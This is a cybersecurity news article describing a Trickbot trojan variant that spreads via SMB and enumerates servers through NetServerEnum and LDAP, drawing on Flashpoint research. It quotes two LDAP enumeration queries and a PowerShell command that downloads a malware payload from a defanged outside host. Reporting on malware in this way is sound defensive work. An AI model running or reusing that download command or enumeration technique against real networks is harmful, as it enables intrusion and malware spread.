Monday, February 10, 2025
HomeMalwareNew Version of Trickbot Trojan Spread via Local SMB to Perform NetServer...

New Version of Trickbot Trojan Spread via Local SMB to Perform NetServer and LDAP Enumeration

Published on

SIEM as a Service

Follow Us on Google News

A New version of Banking Trojan Trickbot Trojan “1000029″ Spreading Via new Module  “worm64Dll” via Email Champaign that imitates as an invoice of largest Financial Institution via Local SMB

It performs scanning to find the list of servers using  NetServerEnum Windows API that spread locally via Server Message Block (SMB).

it also has the ability to performing an Enumeration to others computer using  Lightweight Directory Access Protocol (LDAP) enumeration.

Previous SMB Vulnerability Exploit  Major Impact through WannaCry and Petya Ransomware Global Outbreak.

Also Read  Mobile Banking Malware “Svpeng” Working as a Keylogger and Steals Contacts and Call Logs

Trickbot Trojan Execution Flow

Initially, TrickBot trying to find a list of servers that running on the Network using NetServerEnum and scans LDAP resources.

Trickbot Trojan

Trickbot performing this action using “MachineFinder” and “netscan” functions and NetServerEnum helps to lists all servers of the specified type that are visible in a domain.

Flashpoint Researchers said, More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

Trickbot creates 2 queries to perform LDAP Enumeration.

• (objectCategory=computer)
• (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

it’s also the usage of the Python implementation of the SMB protocol “pysmb,”for querying the Windows 2007, Windows 7, Windows 2012, and Windows 8 Operating Systems (OS) that authentication via NT LM 0.12.

Finally, Trickbot malware communicate with C&C server that injects Powershell scripts and download another Trickbot Malware that name as setup[.]exe,”

Same as Wannacry Ransomware Outbreak, it scan external IPs for SMB connections.

Powershell Script that used to inject to Download another Malware.

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

Trickbot Malware performs major impact with the various Financial institution in various countries and the main purpose of this malware infection to gain access the Local Area Network connection and acting as botnet and infection across the network.

Trickbot Malware also learning the methodology of biggest Global outbreak Ransomware Wannacry and Petya and replicate its Functions. Flashpoint said.

Also Read    Mobile Ransomware “LeakerLocker” Found in Play Store Apps that Encrypt and Send Personal Data on a Remote Server

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Hackers Exploit AnyDesk Vulnerability to Gain Admin Access – PoC Released

A newly discovered vulnerability in AnyDesk, the popular remote desktop software, has sparked serious...

UK Pressures Apple to Create Global Backdoor To Spy on Encrypted iCloud Access

United Kingdom has reportedly ordered Apple to create a backdoor allowing access to all...

Autonomous LLMs Reshaping Pen Testing: Real-World AD Breaches and the Future of Cybersecurity

Large Language Models (LLMs) are transforming penetration testing (pen testing), leveraging their advanced reasoning...

Securing GAI-Driven Semantic Communications: A Novel Defense Against Backdoor Attacks

Semantic communication systems, powered by Generative AI (GAI), are transforming the way information is...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Cybercriminals Target IIS Servers to Spread BadIIS Malware

A recent wave of cyberattacks has revealed the exploitation of Microsoft Internet Information Services...

Hackers Leveraging Image & Video Attachments to Deliver Malware

Cybercriminals are increasingly exploiting image and video files to deliver malware, leveraging advanced techniques...

Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems

Cybercriminals are actively exploiting vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) software to...